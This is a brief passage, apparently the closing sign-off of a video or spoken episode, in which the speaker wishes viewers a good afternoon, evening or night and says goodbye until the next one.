afternoon, evening, or nighttime, whatever time it is for you, and I'll see you in the next one. Bye-bye.